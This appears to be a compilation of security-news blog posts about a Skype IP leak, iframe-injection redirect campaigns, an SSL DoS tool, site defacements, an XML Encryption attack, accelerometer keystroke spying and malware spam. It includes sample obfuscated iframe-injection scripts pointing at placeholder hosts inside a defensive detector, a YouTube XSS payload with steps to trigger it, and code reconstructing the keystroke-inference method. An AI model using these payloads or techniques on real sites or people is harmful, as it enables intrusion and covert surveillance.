Anyone can get your IP address using Skype Vulnerability


A new vulnerability in Skype, found by researchers at NYU-Poly and France’s INRIA, allows anyone to discover your IP address; even a novice can do this.

Even if you are not signed in to Skype, an attacker can still obtain your IP address. With the IP address, an attacker can track your location or attempt to access your system through open ports.

“The Skype privacy settings fail to protect against our scheme,” the study reports.

To conduct the research, the team tracked 10,000 randomly chosen Skype users and ran the attack against them to obtain their IP addresses.

First they retrieved a large number of Skype IDs, along with personal information, from Skype itself. Then these IDs were called on an hourly basis.

The researchers obtained the IP addresses by blocking some of the packets that are sent to the Internet. In doing so they set up a direct communication between the users’ computers and their own, and could then read the users’ IP addresses, explains Ross.

This technique illustrates how vulnerable Skype users could be to an attack and potential blackmail, especially if they are somewhere they shouldn’t be, Ross said.

The study found that thousands of people at a time could be tracked without much trouble.

An attacker can use this vulnerability as a foothold for other cyber crimes.

“It’s bad if you’re concerned about your privacy,” said Ross. “A parent could track their children, or a spouse could track the location of his or her spouse. An employer could track all his employees.”

Other real-time voice communication systems are also vulnerable, but don’t have as “serious” a problem as Skype, said Ross.

Those other systems are vulnerable to attacks, but users can actually see that someone unknown is calling them. This isn’t the case in Skype, Ross said.

More than a year ago, Ross and his team reported this vulnerability to Skype, but there has been no response from their side.

Adrian Asher, Skype's chief information security officer, said that IP addresses are easily uncovered in most web communications clients. "Just as with typical Internet communications software, Skype users who are connected may be able to determine each other's IP addresses. Through research and development, we will continue to make advances in this area and improvements to our software," he said.

Mass iframe injections used to drive traffic | Traffic Direction System (TDS)


Security researchers at Sophos noticed a rise in the volume of Mal/Iframe-Gen detections. A number of sites have been infected using the iframe injection technique. These infected sites are used to drive traffic to other websites (mostly malware sites).


Despite the obfuscation, Sophos products proactively block these malicious scripts as Mal/Iframe-Gen. As the threat name suggests, the payload of the injected script is to write an iframe to the page.

The iframe points to what appears to be a 'middleman' server, used to bounce the traffic elsewhere. This is commonly known as a Traffic Direction System (TDS). The TDS server is under the control of the attackers, enabling them to configure it to redirect user traffic to wherever required.

At first the iframe injection redirected to a freshly registered domain (hosted in Germany). However, the page was unavailable, with all requests getting a 404 error. This was a little surprising given that the attack was new (you expect 404s for old, stale attacks, where the compromised sites persist long after the target payload servers have been shut down).

Later the TDS server was updated to redirect the traffic to a new destination. At the time of writing it is redirecting the traffic to a Blackhole exploit pack site, where the victim is bombarded with the usual Flash, Java and PDF exploits.

The illustration below gives an overview of this attack, and the role that the TDS server plays in it.

This attack provides a perfect illustration of how user traffic is a commodity. Once they have injected numerous sites to redirect to their TDS, the attackers can essentially sell that user traffic to interested parties willing to pay for victims to hit their exploit sites.

As ever, protection from this form of attack consists of several components:
  • detection of the malicious redirects injected into the legitimate sites (in this case, proactive detection as Mal/Iframe-Gen).
  • URL filtering to block requests to the TDS. Thus far, a few different servers are being used in these attacks.
  • URL filtering to block requests to the final destination servers.
  • detection of the exploit site itself (Mal/ExpJS-N) and the various malicious files it uses.
  • detection of the final payload (which will vary as the final destination server changes).
  • if all else has failed, runtime protection (HIPS) to catch the malicious payload running on the victim's machine.
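The first line of defence listed above, spotting the injected redirect, can be checked on a site's own pages. The following added example (not Sophos code, and not the script from the attack) unwraps the cheap encodings injected scripts typically hide behind and flags iframes that are off-site, pixel-sized or hidden; the page host and the domains in the sample HTML are constructed placeholders.

```python
import re
from urllib.parse import urlparse, unquote

# Constructed sample: a legitimate page carrying two injected scripts that
# write hidden, off-site iframes (the Mal/Iframe-Gen pattern). One hides
# behind percent-encoding, the other behind JS \xNN escapes. All hosts are
# placeholders.
PAGE_HOST = "www.example-shop.test"
SAMPLE_HTML = r"""<html><body>
<h1>Welcome</h1>
<iframe src="https://www.example-shop.test/help" width="600" height="400"></iframe>
<script>document.write(unescape("%3Ciframe%20src%3D%22http%3A%2F%2Ftds-example.invalid%2Fin.cgi%3F3%22%20width%3D%221%22%20height%3D%221%22%20style%3D%22visibility%3Ahidden%22%3E%3C%2Fiframe%3E"));</script>
<script>var s="\x3ciframe src=\x22http://payload-example.invalid/x.php\x22 width=0 height=0\x3e\x3c/iframe\x3e";document.write(s);</script>
</body></html>"""

def decode_layers(text, rounds=3):
    """Undo JS \\xNN / \\uNNNN escapes and URL percent-encoding, a few times over,
    so an iframe written via document.write becomes visible to the tag scan."""
    for _ in range(rounds):
        new = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), text)
        new = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), new)
        new = unquote(new)
        if new == text:
            break
        text = new
    return text

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r'([a-zA-Z-]+)\s*=\s*("([^"]*)"|\'([^\']*)\'|([^\s>]+))')

def parse_attrs(raw):
    """Attribute name -> value for quoted and unquoted HTML attributes."""
    return {m.group(1).lower(): (m.group(3) or m.group(4) or m.group(5) or "")
            for m in ATTR_RE.finditer(raw)}

def is_tiny(value):
    """True for 0px / 1px dimensions, the usual size of an injected iframe."""
    try:
        return int(value.strip("px ")) <= 1
    except ValueError:
        return False

def find_suspicious_iframes(html, page_host):
    """Return (src, reasons) for iframes that look like injected redirectors."""
    findings = []
    for m in IFRAME_RE.finditer(decode_layers(html)):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        reasons = []
        if (urlparse(src).hostname or page_host) != page_host:
            reasons.append("off-site src")
        if is_tiny(attrs.get("width", "")) or is_tiny(attrs.get("height", "")):
            reasons.append("0/1-pixel size")
        style = attrs.get("style", "").replace(" ", "").lower()
        if "visibility:hidden" in style or "display:none" in style:
            reasons.append("hidden style")
        if reasons:
            findings.append((src, reasons))
    return findings

if __name__ == "__main__":
    for src, why in find_suspicious_iframes(SAMPLE_HTML, PAGE_HOST):
        print(src, "->", ", ".join(why))
```

A hit only means the iframe deserves a look; the off-site host is where URL filtering (the second and third bullets above) would then be applied.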

THC (The Hacker's Choice) SSL DoS tool released

Today the German hacker group “The Hacker’s Choice” officially released a new DDoS tool. The tool exploits a weakness in SSL to knock a server off the Internet.

Technical details can be found at http://www.thc.org/thc-ssl-dos.

“We decided to make the official release after realizing that this tool leaked to the public a couple of months ago” said a member of THC who wants to remain anonymous.

The tool departs from traditional DDoS tools: it does not require any bandwidth and needs just a single attack computer (“bot”).

The THC-SSL-DOS attack is on par with other resource-exhausting DDoS attacks. Some of those methods played a vital role in demonstrations against oppressive governments (like the DDoS attack against Iran’s leader) and against companies that violate free speech (like the DDoS attack against Mastercard for closing WikiLeaks’ non-profit donation account because of an alleged typo/misspelling in the application form).

“Here at THC the rights of the citizen and the freedom of speech are at the core of our research”, says a member of THC in a private interview this morning.

“We are hoping that the fishy security in SSL does not go unnoticed. The industry should step in to fix the problem so that citizens are safe and secure again. SSL is using an aging method of protecting private data which is complex, unnecessary and not fit for the 21st century.”, Says a THC member, referring to 3 major vulnerabilities disclosed in SSL over the past 3 years.

To list the 3 major vulnerabilities here THC explains: “In 2009 a vulnerability was disclosed that broke the encryption of SSL. De-facto making all SSL traffic unsafe. In 2011 various Certification Authorities got hacked. De-facto making all SSL traffic unsafe _again_.”

“We warned in 2002 about giving hundreds of commercial companies (so called Certification Authorities) a master key to ALL SSL traffic.”, says Fred Mauer, a senior cryptographer at THC. “Only a real genius can come up with such an idea!”.

“And last but not least the immense complexity of SSL Renegotiation strikes again in 2011 with the release of THC-SSL-DOS.”.

“It’s time for a new security model that adequately protects the citizens.”.

The THC-SSL-DOS tool is a proof-of-concept tool to disclose fishy security in SSL. It works well if the server supports SSL Renegotiation. It still works if SSL Renegotiation is not supported, but requires some modifications and more bots before an effect can be seen.

Our tests reveal that the average server can be taken down from a single IBM laptop through a standard DSL connection.

Taking on larger server farms that make use of SSL load balancers required 20 average-size laptops and about 120 kbit/sec of traffic.

All in all superb results.

Interesting here is that a security feature that was supposed to make SSL more secure makes it indeed more vulnerable to this attack:

SSL Renegotiation was invented to renegotiate the key material of an SSL connection. This feature is rarely used. In fact we could not find any software that uses SSL Renegotiation. Yet it’s enabled by default on most servers.

An old saying comes true all over again: Complexity is the enemy of security.

“Renegotiating Key material is a stupid idea from a cryptography standpoint. If you are not happy with the key material negotiated at the start of the session then the session should be re-established and not re-negotiated”, says THC.

LG Australia website hacked and defaced by INTRA Team


Electronics giant LG's Australian website has been hacked and defaced by INTRA Team.

Hacked Site:-
www.lge.com.au
Mirror Link:-
http://www.zone-h.org/mirror/id/15669350

Hackers Message:
It seems as though your website has been hacked.

How did we get past your security?

What security? ;)
The LGE site was taken offline mid-afternoon Sydney time. It has since been restored and now redirects to www.lg.com/au.

It looks like they defaced the website using the common web application vulnerability SQL injection.

LG said it was alerted to the hack on Friday morning and immediately suspended the site "until the incident is fully investigated". It said the attack only affected lge.com.au, not lg.com.au, which had replaced the former as the "local primary hosting solution" a number of years ago.

You can check INTRA Team's past hacks here:
INTRA Team

Interactive YouTube API Demo Beta vulnerable to XSS (Cross-Site Scripting)


A white hat hacker named "Vansh Sharma" discovered an XSS vulnerability in the Interactive YouTube API Demo Beta.

The keyword field is vulnerable to XSS.

Proof:
  • Open http://gdata.youtube.com/
  • Enter script
    <img src="<img src=search"/onerror=alert("xss")//">
    in the keyword area.
  • Press ADD
Vulnerability status:
  • Type: XSS
  • Organization: YouTube.com
  • Status: Unfixed

Microsoft's official YouTube channel hacked and all videos deleted



Microsoft's official YouTube account was hacked by an unknown hacker, who removed all videos from the channel and uploaded four videos of his own, all time-stamped within two hours.

A fifth video was apparently removed. The video, “Garry’s Mod – Escape the Box,” featured what appeared to be an animated gunman shooting at the inside of a construction box. The channel’s description reads, “I DID NOTHING WRONG I SIMPLY SIGNED INTO MY ACCOUNT THAT I MADE IN 2006 :/"

Microsoft has now recovered the account and restored the videos. They still have not determined how the hacker got in.

Hacker called the Boston Police and claimed he hacked their site because he was bored


AntiSec hackers hacked a number of U.S. websites in support of Occupy. One of the victims is the Boston Police Patrolmen's Association (BPPA). The hackers leaked about a thousand usernames and passwords. In addition, the AntiSec movement claimed in an online press release to be publishing more than 600MB of data stolen from the International Association of Chiefs of Police (IACP) website, including names and addresses, passwords and internal documents.

Names, addresses, phone numbers and social security numbers of police officers in Alabama have also been exposed, and a contact database associated with employees and clients of the internet company Matrix Group has been made public.

A hacker called the Boston Police through Skype and claimed he hacked their site because he was bored. Here is part of the conversation between the caller and the police:
--------------
Caller: Your website has been defaced.

Police official: Yes, we're in the process of uh.. investigating it, but apparently someone hacked into our website, but we've..

Caller: Yeah that was me.

Police official: .. shut the website down at this time.

Caller: The person who did it was me.

Police official: You hacked into the website?

Caller: Yes sir.

Police official: Would you like to tell me why you did it?

Caller: AntiSec.

Police official: Is there a particular reason that you did it? Are you trying to prove a point? Or are you just picking on us for any particular reason? What's the problem?

Caller: Just got a bit bored, y'know.

Police official: I can't hear you sir.

Caller: I said, I said I got a bit bored.

Police official: You got a bit bored?

Caller: Yeah.

Police official: That's fine. Alright, well.. perhaps I can break your boredom if we can trace you back and come and put you in jail, we'll get a warrant for you - how's that?

Caller: Well, I'm not in America.

Police official: That's okay. That's alright. It doesn't make any difference where you're at.

Caller: So you're gonna [laughs] come and get me?

Police official: I'm gonna get on a plane in the next few minutes and head that way, start looking for you somewhere.

Caller: Bring it on.

--------------
The Boston Police department has asked all personnel to reset their passwords, and says that it is launching a full investigation into the reported incidents.

Meanwhile, the IACP website is still unavailable; clearly the site's administrators were more comfortable with visitors seeing a holding page than the defaced version, which included an anti-police rap video.

100+ Bollywood sites defaced by XtReMiSt (Muslim Liberation Army)

100+ Indian websites have been defaced by XtReMiSt (Muslim Liberation Army). Most of them are related to Bollywood, including a theatre guide, movie sites and the official websites of several actresses.

Here are a few of the hacked sites:
Bollywood Hindi Movie & Music - Glamsham (Enfotainment Magazine)
www.glamsham.com

Bollywood trade news, box office collection figures, movie release calendar etc.
bollywoodtrade.com

Mumbai Theatre Guide - Latest Information on Hindi, Marathi & English Plays in Mumbai
Mumbaitheatreguide.com

Glamsham Forums
www.forums.glamsham.com

GOLD Awards
www.goldawards.glamsham.com

Official website of Bollywood diva Kangna Ranaut
www.realkangnaranaut.com

Bollywood superstar Mallika Sherawat's official website
www.mallikasherawatwow.com

Bollywood superstar Mallika Sherawat's official second website
www.mallikasherawatworld.com

Jay Chhaniyara - Little Laughter Champion, Comedian
www.laughwithjay.com

Trimurti Films Pvt. Ltd.
www.trimurtifilms.com

Corporate website of BSK Network & Entertainment Pvt Ltd (Boney Kapoor)
www.boneykapoor.co.in
www.bsk.co.in

Woh Tera Naam Tha (the movie)
www.wtnt.glamsham.com

Sowmya Raoh official website (Bollywood)
www.sowmyaraoh.com

Yeh Kaise Mohabbat (movie)
www.ykm.glamsham.com

Hisss - A Film by Jennifer Lynch, official movie website
www.hisssthemovie.com

Movie director Govind Menon's official website
www.govindmenonfilms.com

Sanjay Singh Movies
www.sanjaysinghfilms.com

Here is the full list:
http://pastebin.com/icngsdw4

XML Encryption cracked by researchers at Ruhr University Bochum


Researchers at Ruhr University Bochum (RUB) have cracked part of the XML Encryption standard used in web services. According to the researchers, IBM, Microsoft and Red Hat use the standard in web service applications for a number of large customers. The researchers say that, based on their findings, the standard should now be considered insecure. They plan to publish details about the problem at the upcoming ACM Conference on Computer and Communications Security (ACM CCS 2011) in Chicago.

The official W3C XML Encryption specification is designed to protect data transmitted between online servers, such as those used by e-commerce sites and financial institutions.

As part of their attack, two of the researchers, Juraj Somorovsky and Tibor Jager, sent packets containing modified ciphertext to a server. They intercepted a packet encrypted with AES in cipher-block chaining (CBC) mode and changed the initialisation vector (IV) used in CBC mode. One outcome was that the server returned error messages depending on whether it found an admissible character in the XML when it decrypted the specially crafted packet. By sending the packet with different IVs, it was then possible to "guess what the actual message was".

The researchers say that there is no short-term solution and strongly recommend that the standard be updated. The attack only works when AES is used for encryption in CBC mode. XML Encryption also supports encryption with an RSA key and X.509 certificates. CBC is also involved in the vulnerability in the TLS 1.0 standard; there, IVs that are not randomly generated for individual blocks make it vulnerable to a chosen-plaintext attack (CPA) that reconstructs encrypted cookies that have been transmitted.

source: h-online

iPhone spyware can be used to capture desktop computer keystrokes

An iPhone can be used to capture a desktop computer's keystrokes. Sounds interesting? A team of researchers at Georgia Tech demonstrated how to use a smartphone's accelerometer to capture the keystrokes of a desktop computer by placing the phone nearby.

Patrick Traynor, an assistant professor in Georgia Tech's School of Computer Science, admits that the technique is difficult to accomplish reliably, but claims that the accelerometers built into modern smartphones can sense keyboard vibrations and decipher complete sentences with up to 80% accuracy.

"We first tried our experiments with an iPhone 3GS, and the results were difficult to read," said Traynor. "But then we tried an iPhone 4, which has an added gyroscope to clean up the accelerometer noise, and the results were much better. We believe that most smartphones made in the past two years are sophisticated enough to launch this attack."

The researchers posted what is displayed on the iPhone:

Presently the spyware cannot determine the pressing of individual keys through the iPhone's accelerometer, but "pairs of keystrokes" instead. The software determines whether the keys are on the right or left hand side of a standard QWERTY keyboard, and then whether the pair of keys are close together or far apart.

With the characteristics of each pair of keystrokes collected, it compares the results against a dictionary, where each word has been assigned similar measurements.

For example, take the word "canoe," which when typed breaks down into four keystroke pairs: "C-A, A-N, N-O and O-E." Those pairs then translate into the detection system’s code as follows: Left-Left-Near, Left-Right-Far, Right-Right-Far and Right-Left-Far, or LLN-LRF-RRF-RLF. This code is then compared to the preloaded dictionary and yields "canoe" as the statistically probable typed word.

For understandable reasons, the technique is said to only work reliably on words which have three or more letters.
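The pair-code scheme in the "canoe" example is simple enough to reproduce on a keyboard layout, which also shows why accuracy is limited: many words share a signature. The following is an added illustration, not the Georgia Tech software; the unstaggered QWERTY grid, the left/right hand split and the "near means less than 3 key widths apart" threshold are assumptions, and the mini-dictionary is constructed.

```python
import math
from collections import defaultdict

# Assumed model (not taken from the paper): unstaggered QWERTY grid,
# hands split down the middle, "near" = Euclidean distance < 3 key widths.
ROWS = ["qwertyuiop", "asdfghjkl", "zxcvbnm"]
LEFT_HAND = set("qwertasdfgzxcvb")
NEAR_THRESHOLD = 3.0
KEY_POS = {ch: (col, row) for row, keys in enumerate(ROWS)
           for col, ch in enumerate(keys)}

def pair_code(a, b):
    """Encode one keystroke pair as side-side-distance, e.g. 'LLN'."""
    (xa, ya), (xb, yb) = KEY_POS[a], KEY_POS[b]
    side = lambda ch: "L" if ch in LEFT_HAND else "R"
    dist = math.hypot(xa - xb, ya - yb)
    return side(a) + side(b) + ("N" if dist < NEAR_THRESHOLD else "F")

def encode_word(word):
    """Signature of a whole word: codes of consecutive key pairs, joined by '-'."""
    word = word.lower()
    return "-".join(pair_code(a, b) for a, b in zip(word, word[1:]))

def build_index(dictionary):
    """Map each signature to the words that produce it (3+ letters, a-z only)."""
    index = defaultdict(list)
    for w in dictionary:
        if len(w) >= 3 and all(ch in KEY_POS for ch in w.lower()):
            index[encode_word(w)].append(w)
    return index

def candidates(index, code):
    """Words a recovered signature could have been; more than one = ambiguous."""
    return index.get(code, [])

# Constructed mini-dictionary; "cane", "dame" and "same" share a signature.
DICTIONARY = ["canoe", "cane", "dame", "same", "house", "phone",
              "login", "admin", "password", "secret"]

if __name__ == "__main__":
    idx = build_index(DICTIONARY)
    sig = encode_word("canoe")
    print(sig, "->", candidates(idx, sig))
    for code, words in idx.items():
        if len(words) > 1:
            print("ambiguous:", code, words)
```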

Text recovery

Henry Carter, one of the study's co-authors, explained the attack scenario that they envisaged could be used:

"The way we see this attack working is that you, the phone’s owner, would request or be asked to download an innocuous-looking application, which doesn’t ask you for the use of any suspicious phone sensors."

"Then the keyboard-detection malware is turned on, and the next time you place your phone next to the keyboard and start typing, it starts listening."

Bloody photos of Gaddafi's death: a spam mail leads to malware infection


Malware attackers are taking advantage of the death of Libyan dictator Colonel Gaddafi to spread malware. They have spammed out an attack posing as pictures of Gaddafi's death, tricking users into believing that they came from the AFP news agency and are being forwarded by a fellow internet user.

Spam mail:

Subject: Fw: AFP Photo News: Bloody Photos: Libya dictator Moammar Gadhafi's Death

Message body:

Libya dictator Moammar Gadhafi's Death

Libyan dictator Moammar Gadhafi, the most wanted man in the world, has been killed, the country's rebel government claimed Oct. 20. The flamboyant tyrant who terrorized his country and much of the world during his 42 years of despotic rule was cornered by insurgents in the town of Sirte, where Gadhafi had been born and a stronghold of his supporters.

Attached file: Bloody Photos_Gadhafi_Death.rar
If a Windows user opens the attachment, it will infect the system.

Sophos anti-virus products detect the malware proactively as Mal/Behav-103.